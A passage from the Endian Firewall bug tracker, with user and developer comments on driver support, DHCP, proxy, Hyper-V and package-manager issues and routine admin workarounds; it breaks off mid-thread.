/lib/modules/2.6.32.43-57.e43.i586/kernel/drivers/net/igb.ko.gz is the 1.3.9 version and is loaded by modprobe. This version does not work. Endian 2.5 install didn't even recognise that I had the card as /etc/modprobe.conf made no mention of the igb driver. I had to either add "alias eth igb" to /etc/modprobe.conf or executed "modprobe igb" and see from dmesg that it loaded 1.3.9 but not initialse the 4 ethernet ports.

/lib/modules/2.6.32.43-57.e43/kernel/drivers/net/igb.ko is the 2.4.8 version and was installed by the kernel-module-igb-2.4.8-2.endian2_2.6.32.43_57.e43.rpm. While this version is two years old it does work with my hardware. I could only test this by using insmod. This was how our server was able to limp through the day yesterday.

Last night I applied the e44 updates with no resolution to the problem. I then did a second clean install from the Endian 2.5 ISO. I caught the error when I ran "modinfo igb" and noted the 1.3.9 version and location of this driver.

My solution was:
# gzip -c9 /lib/modules/2.6.32.43-57.e43/kernel/drivers/net/igb.ko > /lib/modules/2.6.32.43-57.e43.i586/kernel/drivers/net/igb.ko.gz
# vi /etc/modprobe.conf (add "alias eth igb")
# depmod -a
# shutdown -r now

This process had to be repeated after I applied the e44 updates.
(0008305)
dbinary   
2012-11-13 19:29   
(edited on: 2012-11-13 19:30)
The procedure that worked for me in endian UTM 2.5 is:

# gzip -c9 /lib/modules/2.6.32.43-57.e43/kernel/drivers/net/igb.ko > /lib/modules/2.6.32.43-57.e43.i586/kernel/drivers/net/igb/igb.ko.gz
# vi /etc/modprobe.conf (add "alias eth igb")
# modprobe igb
# depmod -a
# reboot

(0008364)
EDV-Team   
2013-01-23 10:03   
Thank you very much for your feedback! It works! :)

All i have to do was:
1. Switch to development channel with 'efw-upgrade -s'
2. smart install igb
3. gzip -c9 /lib/modules/2.6.32.43-57.e43/kernel/drivers/net/igb.ko > /lib/modules/2.6.32.43-57.e43.i586/kernel/drivers/net/igb.ko.gz
4. vi /etc/modprobe.conf (add "alias eth igb")
5. depmod -a
6. reboot
(0008371)
d072330   
2013-02-13 06:25   
How do you do this if you cannot get past the wizard? I have tried to connect to the serial port to install the Intel drivers but have had no luck getting connected.
(0008372)
EDV-Team   
2013-02-13 08:05   
Our Endian Firewall is running on a Dell PowerEdge R210 Server that has two Broadcom on-board NICs. We changed only the additional PCIe Broadcom network card with the Intel Server Adapter to have 6 Ethernet ports instead of 4 ports.

If you have no other working network card in your system, than it's really hard to install the Intel network drivers.
(0008373)
d072330   
2013-02-13 14:55   
I have one working NIC.
(0008375)
dbinary   
2013-02-13 18:21   
Is not necessary pass the wizard only connect a monitor and press 0 option from menu, after enable ssh service login to ssh and follow the steps.


# gzip -c9 /lib/modules/2.6.32.43-57.e43/kernel/drivers/net/igb.ko > /lib/modules/2.6.32.43-57.e43.i586/kernel/drivers/net/igb/igb.ko.gz
# vi /etc/modprobe.conf (add "alias eth igb")
# modprobe igb
# depmod -a
# reboot
(0008376)
d072330   
2013-02-13 18:50   
This directory does not exist on my machine.

/lib/modules/2.6.32.43-57.e43/kernel/drivers/net/

I only have this directory: /lib/modules/2.6.32.43-57.e43.i586/kernel/drivers/net/igb/

Do I need to do something with this file first (igb-4.1.2.tar.gz)?
(0008377)
EDV-Team   
2013-02-13 20:14   
You need an Internet connection on your Endian Firewall to download the IGB driver package from Endians "development channel". Use 'efw-upgrade -s' to switch to this channel and 'smart install igb" to download and install the driver package.
(0008378)
d072330   
2013-02-14 23:56   
got to internet did these steps:

1. Switch to development channel with 'efw-upgrade -s'
2. smart install igb
3. gzip -c9 /lib/modules/2.6.32.43-57.e43/kernel/drivers/net/igb.ko > /lib/modules/2.6.32.43-57.e43.i586/kernel/drivers/net/igb.ko.gz
4. vi /etc/modprobe.conf (add "alias eth igb")
5. depmod -a
6. reboot

When I rebooted it still did not see the extra NIC's. When I do a lsmod | grep igb nothing shows but if we grep for igb we get this:

kernel-module-igb-2.4.8-2.endian2_2.6.32.43_57.e43
igb-2.4.8-2.endian2_2.6.32.43_57.e43

Why after reboot is the driver not sticking?
(0008379)
EDV-Team   
2013-02-15 05:34   
Try this:
1. cp /lib/modules/2.6.32.43-57.e43/kernel/drivers/net/igb.ko /lib/modules/2.6.32.43-57.e43.i586/kernel/drivers/net/
2. modprobe igb
3. depmod -a
4. reboot
(0008382)
d072330   
2013-02-19 05:23   
What worked for us was getting the latest Intel driver and installing it.
(0008463)
luca-endian   
2013-08-26 08:37   
I think this should be fixed with 2.5.2
(0008466)
EDV-Team   
2013-08-26 09:29   
No! Intel 82580 based network cards are still not supported in Endian 2.5.2, because the Intel IGB driver included in Kernel 2.6.32 is too old and doesn't support this chipset!

IGB driver version in Endian 2.5.2 is: 1.3.16
To get Intel 82580 based cards to work we need at least driver version 2.4.x.
(Because of this there was a separate IGB driver package for a while in the Endian 2.5.1 development channel that includes driver version 2.4.8)

Please provide a newer Intel IGB driver to support these cards!
(Latest Version of the driver is 5.0.5)
(0008514)
Mike_Seaman   
2013-09-06 15:35   
I have confirmed this issue. I can replicate on upgrade and clean install.
Please 'rpmbuild -tb igb.tar.gz' latest IGB driver 5.0.5 from https://downloadcenter.intel.com/confirm.aspx?httpDown=http://downloadmirror.intel.com/13663/eng/igb-5.0.5.tar.gz&lang=eng&Dwnldid=13663 [^]

or allow us to download kernel-dev SRPMS so that we can compile our own drivers.

thank you
(0008551)
Mike_Seaman   
2013-10-09 15:36   
bump. This fix will only take 20 minutes. what is the status?
(0008552)
Anonymous   
2013-11-26 15:39   
http://jira.endian.com/browse/CORE-629 [^]





View Issue Details
4033 [Endian Firewall] GUI minor always 2011-07-22 08:28 2013-11-23 03:34
davide-endian  
Anonymous  
normal  
resolved 2.4  
fixed  
none    
none future  
   
wrong redirection from the / url, when natted
endian_appliance: endian appliance on a local network.
public_server: computer on the same local network and with a public IP.

On public_server there's a NAT rule for connections to tcp port 10444, mapping it to endian_appliance:10443

Connecting to https://public_server:10444/ [^] the correct certificates exchange with endian_appliance takes place, but after that the login never appears, since you're redirected to https://local_ip_of_endian_appliance:10443/ [^]
Connecting to https://public_server:10444/manage/dashboard/ [^] (or other /manage/ or /cgi-bin/ urls) works fine.
There are no notes attached to this issue.





View Issue Details
2811 [Endian Firewall] Other Services major always 2010-04-02 04:53 2013-10-14 17:09
CALYSTO  
test  
normal  
feedback 2.3  
reopened  
none    
none  
   
DNS Dynamic with zoneedit isn´t work for empty Host Name
Hi, i´m having problems with DNS Dynamic service when i use zoneedit. I put the file of the issue 0001372.
This work´s fine when i complete something in the field of Host Name, zoneedit update really fast the changes. But in zoneedit i don´t need complete this field (Host Name), for that reason when i don´t write anything in Host Name, and click on Add, the line of the new dynamic dns appear but don´t update in the zoneedit zone.
I come from IpCop but when i discover Endian, i try and try and try because this is a really good firewall and really like it, more than ipcop, but i can´t do work.
Please help.

Thanks for all.
There are no notes attached to this issue.





View Issue Details
4573 [Endian Firewall] DHCP Server minor always 2013-09-19 17:41 2013-09-26 16:41
junior.eng.br  
junior.eng.br  
high  
resolved 2.5  
fixed  
none    
none  
   
dhcp fixedleases
When we insert or delete a Mac fixed in DHCP Server rule does not apply.
Services --> Add a fixed lease
Capturar_dhcp.PNG (11,590) 2013-09-19 17:41
https://bugs.endian.com/file_download.php?file_id=1060&type=bug
Notes
(0008530)
daniele-endian   
2013-09-20 08:52   
Check the permission under /var/efw/dhcp/ all the files should have nobody:nobody as owner of the files

root@endian:~ # ls -lh /var/efw/dhcp/
total 12K
-rw-r--r-- 1 nobody nobody 0 Aug 20 16:14 custom.tpl
-rw-r--r-- 1 nobody nobody 0 Sep 13 2012 empty
-rw-r--r-- 1 nobody nobody 36 Jul 29 15:50 fixleases
-rw-r--r-- 1 nobody nobody 562 Aug 20 16:14 settings
-rw-r--r-- 1 nobody nobody 526 Aug 20 16:14 settings.old
(0008541)
junior.eng.br   
2013-09-26 16:40   
Solved
(0008542)
junior.eng.br   
2013-09-26 16:41   
Permissions, Solved





View Issue Details
4577 [Endian Firewall] Uncategorized major always 2013-09-25 05:06 2013-09-25 05:06
kjameson  
 
normal  
new  
open  
none    
none  
   
Version 2.4.1 Memory Leak
Memory Leak - Exactly same as 0000117 - Must reboot every week ... otherwise system crashes.
Wait 1 week ...
Apparently this never got fixed?
There are no notes attached to this issue.





View Issue Details
4272 [Endian Firewall] Hardware related (kernel, drivers, hardware) minor always 2012-02-05 19:56 2013-09-24 20:53
Byzt  
 
normal  
acknowledged 2.5  
open  
none    
none  
   
Endian 2.5.1 does not support IBM x3250 Servers
I'm installing endian 2.5.1 for ibm x3250 but does not support. Endian 2.4.1 is working on x3250
x3250 model no : 4364
Notes
(0007697)
Byzt   
2012-02-05 20:00   
"Your Harddisk is to small"
(0007702)
christian-endian   
2012-02-07 12:15   
Can you have a look at the second console (you can switch with Alt+F2) and see what the problem is?

Thanks
(0007705)
aocsody   
2012-02-09 12:18   
(edited on: 2012-02-10 14:15)
We have a same issue: this kernel does not support MPT SAS RAID.
Is there any available solution for this problem?

(0007715)
aocsody   
2012-02-13 15:47   
There was a solution for the upgrade 2.3-->2.4.1. Here is the ticket number: 0003259. Maybe its the same issue...
Thx
(0007845)
Byzt   
2012-04-24 15:34   
I'm trying to install again. But We have take same issue.
And I press to the alt+f2. We got the "hard drive not found"

How can i do ?
(0008363)
aocsody   
2013-01-18 21:03   
Hi! Is there any new information or a solution to the problem? We would like to upgrade the system, but if the latest iso (kernel) does not include the required raid driver we cannot do that.
Thx!
(0008536)
tiagoaviz   
2013-09-24 20:53   
We really really need this fixed ASAP.

There are many customers, even in the Enterprise version, unable to install EFW onto IBM hardware because of this lack of support.





View Issue Details
3266 [Endian Firewall] DHCP Server tweak always 2010-11-08 08:31 2013-09-24 09:04
gmar_87  
simon-endian  
normal  
resolved 2.4  
fixed  
none    
none 2.3  
   
Expired Leases
Expired DHCP leases are never cleared from Endian Firewall.
I have leases from August 2010 still appearing in the web-interface.
The only way i can clear them is to edit or delete the dhcpd.leases file in /var/efw/dhcp

Can a feature be added so that we can choose how long to keep expired leases (1 week, 2 weeks, etc..)?
Endian_2.4.1_DHCP_ExpiredLease.jpg (22,123) 2010-11-24 09:20
https://bugs.endian.com/file_download.php?file_id=549&type=bug
Notes
(0005181)
gmar_87   
2010-11-23 07:34   
An option to clear all dynamic leases regardless of age would also be much appreciated.
(0005183)
lorenzo-endian   
2010-11-23 10:06   
Hi gmar_87,

In "Services" >> "DHCP serer", if you click on the "+" sign, you should be able to set the leases for the DHCP ...

Does a reconfiguration of these setup solve the problem?

Thanks in advance!

Lo
(0005190)
gmar_87   
2010-11-24 09:19   
Hi Lo,

I have tried re-entering the configuration and saving settings but an old lease is still shown. Here is my dhcpd.conf, minus the fixed leases i have setup:

******dhcpd.conf******

ddns-update-style none;
deny bootp;
authoritative;
option wpad code 252 = text;



shared-network GREEN {
    interface br0;
    server-identifier 10.1.1.1;
    subnet 10.1.1.0 netmask 255.255.255.0 {
        pool {
            deny dynamic bootp clients;
            range 10.1.1.50 10.1.1.60;
        }
        default-lease-time 3600;
        max-lease-time 7200;
        option subnet-mask 255.255.255.0;
          option domain-name "GMAR";
          option routers 10.1.1.1;
          option wpad "http://10.1.1.1/proxy.pac"; [^]
          option domain-name-servers 10.1.1.1;

******dhcpd.conf******

As you can see, the max lease time is 120 minutes. After 120 minutes the lease still appears on this page, but the "Lease expires (local time d/m/y)" column shows and strike through the time stamp. See screenshot attached.
(0005293)
lorenzo-endian   
2010-12-03 13:27   
Hi gmar_87,

I can confirm that the leases stay there even when expired; I think that this aspect should be improved :-)

Thanks for providing this hint to us!

Lo
(0008535)
Anonymous   
2013-09-24 09:04   
Hi guys to clear the dhcp lease information just remove the file "dhcp lease" and "dhcp lease~" in "/var/lib/dhcp". And refresh the web interface....





View Issue Details
4574 [Endian Firewall] Proxy HTTP major always 2013-09-22 10:11 2013-09-22 19:50
BT  
 
urgent  
new 2.5  
open  
none    
none  
   
HTTPS connections with Endian Firewall 2.5.2
Hello,
I'm Using Endian Firewall 2.5.2 Community Edt. I use transparent proxy mode if I try https site not opening sample https://www.google.com [^] and try watch to youtube video failed.

My Hardware Config
Intel i5 3210
2 GB Ram
Red(PPPoe)+Green(Local Lan) Interface
Notes
(0008534)
bogdan1   
2013-09-22 19:50   
Hello BT

In transparent mode https traffic doesnt go through proxy and cant be filtered.
It had to be allowed in outgoing firewall, but the real problem is that google recently activated automatic redirection from http to https.

Regards
Bogdan





View Issue Details
2914 [Endian Firewall] Hardware related (kernel, drivers, hardware) feature always 2010-05-23 17:37 2013-09-21 01:59
deepthought  
 
normal  
new 2.3  
open  
none    
none  
   
Hyper-V Network-Drivers Support
Support for Hyper-V native "Network Adapter", works currently only with mindboggingly slow "Legacy Network Adapter", max throughput approx 10 MBit
Running efw virtualized might not be the suggested way, but somehow keeps coming I guess. See: http://endian-forum.de/index.php?page=Thread&postID=85#post85 [^] (in german). Beside me there seem to be more users who would appreciate running a efw instance as Hyper-V Guest OS.
Notes
(0006640)
marioeirea   
2011-06-08 05:04   
I'm there with you, it would help a lot in our environment. Currently we can only get about 12 Mbps through the legacy network adapter. Endian 2.4.1 has kernel 2.6.32 which has the integration components, maybe this feature can be enabled?
(0006696)
baldy   
2011-06-09 21:02   
Drivers for linux are available from Microsoft.

http://www.microsoft.com/downloads/en/details.aspx?FamilyID=eee39325-898b-4522-9b4c-f4b5b9b64551&displaylang=en [^]

Regards,

Klaas-Jan
(0006722)
thehinac   
2011-06-15 06:22   
Not currently any decent firewalls for hyper-v, and it works great in a guest os at work and home. The only solutions is Endian with legacy network adapter, but 12Mbs is :(. Can integration components be turned on or have the microsoft drivers installed? that would make my year.
(0006723)
thehinac   
2011-06-15 06:23   
Is this going to be possible?
(0006729)
marioeirea   
2011-06-15 15:02   
(edited on: 2011-06-15 15:08)
I have tried installing the integration components in the past but I just cant get them to compile on they system. When trying to install compile i get lots of dependency errors for packages I cant find on the development RPMs.

Another thing I forgot to mention in the original post. When traffic on the legacy adapter approaches 12mbps, sometimes the adapter will loose connection. At this point I have to cycle eth0 (ifconfig eth0 up/down) to bring it back.

(0007086)
BonezAU   
2011-07-26 01:59   
We are also running Endian in Hyper-V with 70 users... the speed and throughput is really really bad. It's becoming a big problem now.

Anyone know how I can get integration services working so I can use the real ethernet adapter?

Running 2.3 with 2.6.32.26-57.e40.i586
(0007237)
gsimms   
2011-08-02 23:26   
I also have a customer who is requesting to run endian within a Hyper V server is this supported yet in 2.4 enterprise?
(0007260)
deepthought   
2011-08-03 16:22   
@thehinac: Smartass. Setting the issue to "feedback" (which is: feedback by the submitter) is SURELY a great way of drawing their attention to this one... Argh.
(0007848)
marioeirea   
2012-04-28 06:28   
Any chance of including the drivers on the PAE kernel at least?
(0007861)
Danoh   
2012-05-10 14:55   
Any word on this? The speed limit of 10 mbit on the legacy hyperv network adapters are BAD. we need integration support for hyperv
(0008533)
deepthought   
2013-09-21 01:59   
Dear Endians, according to my calender, >1y passed. This timespan is commonly known as "wontfix". Am I right? If thats the case, I kick out your stuff and buy something from <<hereBeDifferentVendor>>.





View Issue Details
4571 [Endian Firewall] Proxy - HTTP minor always 2013-09-18 09:09 2013-09-20 09:12
spewk  
 
normal  
new 2.5  
open  
none    
none  
   
Slow HTTPS connections with Endian Firewall 2.5.2
Hi all,
after updating 3 installations of Endian Firewall, from version 2.5.1 to 2.5.2, i'm experiencing a really slow connection to HTTPS sites
i can experience this both with Windows XP and Windows 7, using Internet Explorer 8, 9 or 10
I haden't this problem with 2.5.1

Some clients are strangely not affected by this problem, but i haven't found any clue (they're using the same content filter, same firewall rules, same Internet Explorer config)

for example, if i try to connect to www.microsoft.com via HTTP it gets 3 seconds to have the full page displayed, if i try the HTTPS version it needs 20 seconds!

My configuration:
Endian firewall 2.5.2 on VmWare ESXi 4.1, with 2 CPUs and 2 gb RAM. 2 of them have the RED on Ethernet static, the other one is configured in Gateway mode.
AD Joined proxy with some sites open to everyone (no login) on Squid and other ones with AD groups + Dansguardian rules

The problem is occuring with both the "no login" and Dansguardian sites

Daniele
Notes
(0008531)
luca-endian   
2013-09-20 09:08   
maybe a proxy.pac wpad.dat problem?
(0008532)
spewk   
2013-09-20 09:12   
They're not using any configuration script, just the manual proxy settings on IE (deployed via GPO)
Daniele





View Issue Details
4441 [Endian Firewall] Proxy HTTP block always 2012-08-29 11:28 2013-09-20 09:00
ardit-endian  
 
normal  
new 2.5  
open  
none    
none  
   
Proxy Maximum upload/download size not working
When we set the limit, example 6000 / 6000 or 10000 / 10000 which actually means 10MB, the bigger files are blocked correctly however no webpage could be visited, either light ones like google.com
Reproduced with 2.5, to reproduce, just set the limits and try to navigate.
I did notice on the logs anything relevant except a warning:
2012/08/29 12:26:52| WARNING: No units on 'request_body_max_size 10000KB', assuming 10000.000000 bytes

which actually doesn't say much.

A customer reproduced this on different firewalls, actually he didn't had this issue with 2.4
Notes
(0008522)
lboni2   
2013-09-14 16:27   
Good morning! Please, I have this same problem (EFW 2.5.2). I wonder if there is a fix for this bug. Or at least, how it could make a manual correction. Can I edit the squid.conf file directly? Thank you, Luciano.





View Issue Details
4270 [Endian Firewall] Proxy HTTP minor always 2012-02-05 16:22 2013-09-20 09:00
tradermail-enupdate  
 
normal  
acknowledged 2.5  
open  
none    
none  
   
'Maximum download size' proxy setting does not work
Setting a value in 'Maximum download size (incoming in KB)' under Proxy > Configuration > Proxy Settings does not work

I have looked in the '/etc/squid/squid.conf.tmpl' file and it looks like there may be a bug in the configuration.

reply_body_max_size ${MAX_INCOMING_SIZE}KB allow from_all

I was able to get the 'Maximum download size' working by changing the line to

reply_body_max_size ${MAX_INCOMING_SIZE} allow from_all

Then entering the value in the GUI as bytes not KB
Notes
(0008523)
lboni2   
2013-09-14 16:30   
Good morning! Please, I have this same problem (version 2.5.2). I wonder if there is a fix for this bug. Or at least, how it could make a manual correction. Can I edit the squid.conf file directly? Thank you, Luciano.
(0008525)
luca-endian   
2013-09-17 14:25   
the bug description includes the manual fix





View Issue Details
4563 [Endian Firewall] Endian Firewall GUI major always 2013-08-28 23:03 2013-09-19 22:28
msoliveira01  
luca-endian  
immediate  
new 2.5  
open  
none    
none  
   
The antispyware service can not be disable on GUI or the white/black list to be edit
The new antispyware feature can not be disabled on version 2.5.2 by the GUI, when we try to save the modifications or disable the service, all we can see is a white screen trying to apply the modifications
The interface only back if we refresh the page, but the modifications are not applied.
The problem is that a lot of URL that are in the black list are a phishing like www.bradesco.com.br that is a Bank web site.
Proxy -> DNS ->anti-spyware
Endian 2.5.2.jpg (122,141) 2013-08-28 23:03
https://bugs.endian.com/file_download.php?file_id=1055&type=bug
Notes
(0008483)
luca-endian   
2013-08-29 08:00   
can you please verify the permissions of /var/efw/dnsmasq/settings ?
They should be like this:
-rw-r--r-- 1 nobody nobody 405 Aug 6 10:27 settings
(0008486)
luca-endian   
2013-08-29 08:25   
(edited on: 2013-08-29 08:26)
BTW I'm not sure I would trust this bank :D
http://www.phishtank.com/phish_detail.php?phish_id=1976608 [^]

Actually we block domain that have confirmed phish in their root directory and this the case actually..

If you are sure 100% the bank is safe (phishtank says not :) ) you could whitelist

(0008499)
msoliveira01   
2013-08-29 16:39   
it works! the permission was -rw-r--r-- 1 root root
(0008503)
luca-endian   
2013-08-30 09:05   
ok so it's a permission problem..
(0008507)
carlos-endian   
2013-09-02 11:06   
Issue reported and will be fix soon, when is ready will be inform you.
Thanks for your help
(0008526)
luca-endian   
2013-09-17 14:55   
msoliveira01 we can't reproduce this.. did you upgrade it or install from scratch?
and if you install did you restore a backup?
(0008527)
luca-endian   
2013-09-17 14:56   
someone else experienced this issue?
(0008528)
msoliveira01   
2013-09-17 17:47   
Hello Luca,
I upgraded it from version 2.4.1
(0008529)
josegjimenez   
2013-09-19 22:28   
Hola he resuelto el problema, buscando desde la consola web en el firewall:

Ingresen como root, van a la ruta cd /var/efw/dnsmasq
Ejecutan ls -l y verán los permisos de cada modulo

allí deben ver algo como esto:

-rw-r--r-- 1 nobody nobody blackholedns.custom
-rw-r--r-- 1 nobody nobody blackholedns.ignore
drwxr-xr-x 2 nobody nobody default
-rw-r--r-- 1 nobody nobody destination_bypass
-rw-r--r-- 1 nobody nobody empty
-rw-r--r-- 1 nobody nobody hosts
-rw-r--r-- 1 nobody nobody local_nameserver
-rw-r--r-- 1 root root settings
-rw-r--r-- 1 nobody nobody settings.old

Por alguna razón nuestro settings paso a ser del root, pero tranquilos desde la consola en la ruta /var/efw/dnsmasq ejecutaremos mv settings settings.back donde renombraremos el settings de root y luego renombraremos el settings de nobody (el nuestro) mv settings.old settings

automáticamente ya podemos usar el dns proxy de nuestro grandioso firewall





View Issue Details
4572 [Endian Firewall] Hardware related (kernel, drivers, hardware) block always 2013-09-19 10:10 2013-09-19 10:10
epiphany  
 
normal  
new 2.5  
open  
none    
none  
   
Error Reading Target Device
Hello,
I have a problem installing on a congatec mainboard! The installation always says "Error reading target device" by clicking "OK" it says: "HArddisk to small"! I think the endian installation do not know the chipset of congatec mainboard. Can somebody help to improve the error?

Thanks
There are no notes attached to this issue.





View Issue Details
4449 [Endian Firewall] QoS minor always 2012-09-04 02:17 2013-09-12 08:10
mhLearn  
 
normal  
new 2.5  
open  
none    
none  
   
Qos Device Name Changed When Edit Existing Entry
When tried to edit existing QoS entry, i.e. VLAN ID tagged BLUE zone, device name changed to VPN IPSEC after saved.
version 2.5.1
Qos Issue 4.jpg (154,404) 2012-09-04 02:17
https://bugs.endian.com/file_download.php?file_id=983&type=bug
Notes
(0008225)
omriasta   
2012-10-05 16:22   
noticed this behavior as well
(0008521)
mhLearn   
2013-09-12 08:10   
happens on v 2.5.2 too.





View Issue Details
4570 [Endian Firewall] Network related (VPN, uplinks) minor always 2013-09-11 05:54 2013-09-11 05:54
mhLearn  
 
normal 2.5.2  
new  
open  
none    
none  
   
PPPoE Connection Hard To Establish
After upgrade to v2.5.2, once the connection was down, it was very hard to connect back. Sometimes, it took more than a hour to connect again.
It was upgraded from 2.5.1 to 2.5.2, and no change make on the PPPoE settings.
PPPoE Connection Log.txt (15,773) 2013-09-11 05:54
https://bugs.endian.com/file_download.php?file_id=1059&type=bug
There are no notes attached to this issue.





View Issue Details
4569 [Endian Firewall] Endian Firewall minor have not tried 2013-09-06 12:40 2013-09-06 12:40
jcvn  
 
normal  
new 2.5  
open  
none    
none  
   
CBQ not boot with the system.
CBQ not boot with the system, Attempt to boot via the / etc / rc.d / rc.ipac cbq start by entering the command in the last exit 0 lilnha before without success.
There are no notes attached to this issue.





View Issue Details
4566 [Endian Firewall] Installation major always 2013-09-02 09:29 2013-09-05 22:44
davvidde ESXi 3.5  
3.5.0 build 988599  
normal  
new 2.5  
open  
none    
none  
   
Hang on installation
Endian 2.5.1 and 2.5.2 hangs on install. If I change to shell ALT+2 I notice the loop on detecting hardware. I also tried with Boot:nousborpcmcia but the result was the same.
Install from iso file
endian_loop.JPG (123,380) 2013-09-02 09:45
https://bugs.endian.com/file_download.php?file_id=1056&type=bug
Notes
(0008506)
davvidde   
2013-09-02 09:53   
(edited on: 2013-09-02 09:54)
The problem is present also in 2.4.1. In version 2.2 I am able to install but upgrade failed with efw-upgrade

(0008513)
davvidde   
2013-09-05 22:44   
Here http://www.efwsupport.com/index.php?topic=2474.msg6662#msg6662 [^] is posted a possible workaround solution to install the distro.





View Issue Details
4567 [Endian Firewall] Proxy - HTTP minor always 2013-09-02 13:17 2013-09-02 13:17
baldy  
 
normal  
new 2.5  
open  
none    
none  
   
2.5.2 CE Squid Zero Sized Reply
After upgrading some 2.5.1 CE systems to 2.5.2 CE Squid is no longer retrieving webpages but instead reports a zero sized reply (screenshot attached)

To solve this problem the Squid cache needs to be cleared via Proxy-Cache Management - Clear Cache
2.5.1 CE with manual proxy enabled, contentfiltering and virusscanning are also active.
zerosized.jpg (20,650) 2013-09-02 13:17
https://bugs.endian.com/file_download.php?file_id=1057&type=bug
There are no notes attached to this issue.





View Issue Details
4562 [Endian Firewall] Other Scripts minor always 2013-08-25 10:06 2013-08-30 09:09
svoelker Endian Firewall Community 2.5.2  
luca-endian  
normal 2.5.2  
confirmed 2.5  
open  
none    
none  
   
SMART Package Manager Error - SHA256 / Hashlib Python not working.
Since the Update to 2.5.2 the Smart Package manager does not work anymore with SHA256 checksum, this also apprears on a fresh 2.5.2 install from iso.

With Endian 2.5.1 everything is working as intendet.
Add a repo channel with SHA256 signed rpms.

for example:
smart channel --add CentOS6.2 type=rpm-md name="CentOS6.2" \ baseurl="http://vault.centos.org/6.2/os/i386/" [^] components=base

then run:
smart update

it crashes when it tries to update the repo cache database.
Traceback (most recent call last):
  File "/usr/bin/smart", line 200, in ?
    main(sys.argv[1:])
  File "/usr/bin/smart", line 173, in main
    exitcode = iface.run(opts.command, opts.argv)
  File "/usr/lib/python2.4/site-packages/smart/interface.py", line 53, in run
    result = _command.main(self._ctrl, opts)
  File "/usr/lib/python2.4/site-packages/smart/commands/update.py", line 82, in main
    failed = not ctrl.reloadChannels(channels, caching=NEVER)
  File "/usr/lib/python2.4/site-packages/smart/control.py", line 388, in reloadChannels
    if not channel.fetch(self._fetcher, progress):
  File "/usr/lib/python2.4/site-packages/smart/channels/rpm_md.py", line 287, in fetch
    fetcher.run(progress=progress)
  File "/usr/lib/python2.4/site-packages/smart/fetcher.py", line 253, in run
    if not handler.tick():
  File "/usr/lib/python2.4/site-packages/smart/fetcher.py", line 1596, in tick
    withreason=True)
  File "/usr/lib/python2.4/site-packages/smart/fetcher.py", line 408, in validate
    from smart.util.sha256 import sha256
ImportError: No module named sha256
Notes
(0008493)
svoelker   
2013-08-29 12:43   
no one an idea ? :)
(0008494)
luca-endian   
2013-08-29 14:07   
seems that the python module is missing.. never found out, probably, because our channels (even enterprise) are not signed with sha256
(0008495)
svoelker   
2013-08-29 15:17   
there anyway to hotfix this?
id even do it myself :)

but its wierd, because in 2.5.1 everything was working.

Since 2.5.2 it does not anymore.
(0008496)
carlos-endian   
2013-08-29 15:52   
The python module sha256 in not present in community 2.5.2, i have test in enterprise and all work fine.

In this moment Centos 6.2 is not compatible with our distribution.

On eFetching information for 'CentOS6.2'...
-> http://vault.centos.org/6.2/os/i386/repodata/repomd.xml [^]
repomd.xml ########################################################################################## [ 68%]
-> http://vault.centos.org/6.2/os/i386/repodata/0664ff4efbfd4a759077eac6039a5b1a8ddec69b630fc92604a3a693347a043d-filelists.xml.gz [^]
-> http://vault.centos.org/6.2/os/i386/repodata/db23b7c71bacbe9ad01047445ca3636d33777f5a4cabfd7cd3ce99204bde6e58-primary.xml.gz [^]
db23b7c71bacbe9ad01047445ca3636d33777f5a4cabfd7cd3ce99204bde6.. ########################################################################################## [ 75%]
0664ff4efbfd4a759077eac6039a5b1a8ddec69b630fc92604a3a693347a0.. ########################################################################################## [ 81%]

Updating cache... ########################################################################################## [100%]

Channels have 4764 new packages.
Saving cache...nterprise:
(0008497)
svoelker   
2013-08-29 15:55   
ye i know its not compatible, it was just an example.

but we got other distributions that are compatible and use sha256 signed rpms

but without working sha256 its hard to customize.

and i wont touch the python setup, that detroys it all :)
(0008498)
svoelker   
2013-08-29 15:56   
community edition that is.
(0008504)
luca-endian   
2013-08-30 09:08   
we'll se what we can do





View Issue Details
3492 [Endian Firewall] Other Services minor always 2011-02-22 11:47 2013-08-29 19:39
luca-endian  
luca-endian  
normal  
feedback 2.4.1  
reopened  
none    
none  
   
no support for untagged packets
Currently there is no support for untagged IEEE 802.1Q packets if on the interface there is already a tagged interface.

Ex.
eth0.1 vlan 1
eth0.2 vlan 2

but you can't use any more eth0
Notes
(0008500)
luca-endian   
2013-08-29 16:54   
actually I've contradict my self..
for what I found it's Linux implementation that doesn't support untagged together with tagged :|
(0008501)
Luca Lesinigo   
2013-08-29 19:39   
Linux does support tagged + untagged 802.1Q VLANs just fine.





View Issue Details
4412 [Endian Firewall] Other Services minor always 2012-08-01 12:58 2013-08-27 07:16
barbalarga  
daniele-endian  
normal  
resolved 2.5  
fixed  
none    
none  
   
Traffic monitoring interface work for only some seconds
Endian version 2.5.1
After I've enabled the traffic monitoring is possible to access on the administrative interface immediatly but for only 30 or 40 seconds then the browser show the following error: "connection refused"
If I swith off and then on the traffic monitoring I can access to the administrative interface for another 30/40 seconds and then "connection refused" again.
The system access rules is ok.

Thank you, best regards.
Paolo
Notes
(0008299)
Anonymous   
2012-11-13 15:53   
I have the same issue
(0008435)
soportenalucho   
2013-06-06 22:25   
Any solution?
(0008444)
daniele-endian   
2013-07-12 11:02   
Hi guys,

please try with the following configuration

===========================================
root@endian:~ # cat /etc/ntop/ntop.conf.tmpl
--user ntop
--daemon
--db-file-path /var/ntop
--interface br0,br1,br2
--trace-level 3
--http-server 0
--https-server 3001
--ipv4
--max-table-rows 150
-x 1000

===========================================
Then do restartntop -f the webinterface with this config should be working fine
(0008473)
mhLearn   
2013-08-27 04:55   
above configuration or upgraded to v2.5.2 will solve the issue





View Issue Details
4415 [Endian Firewall] Other Services major always 2012-08-08 05:25 2013-08-27 07:16
mhLearn  
lorenzo-endian  
normal  
resolved 2.5  
fixed  
none    
none  
   
NTOP / Traffic Monitoring Is Not Working
On Endian Firewall 2.5.1.

The NTOP doesn't work even Intrusion is turned off (some reported this issue may due to Intrusion turned on).
NTOP_Not Working.jpg (118,547) 2012-08-08 05:25
https://bugs.endian.com/file_download.php?file_id=972&type=bug
NTOP_Error.txt (22,010) 2012-10-24 08:46
https://bugs.endian.com/file_download.php?file_id=998&type=bug
Notes
(0008000)
lorenzo-endian   
2012-08-08 15:19   
hi mhLearn,

could this issue be the same described in the bug http://bugs.endian.com/view.php?id=4412 [^] ?

thanks in advance!

Lo
(0008242)
mhLearn   
2012-10-19 09:34   
Hi Lo,

In my case was worsen, the traffic monitoring was not able to load, error message "unable to connect".

thx
mh
(0008243)
mhLearn   
2012-10-19 10:10   
Noticed some said the problem solved after while, eg.
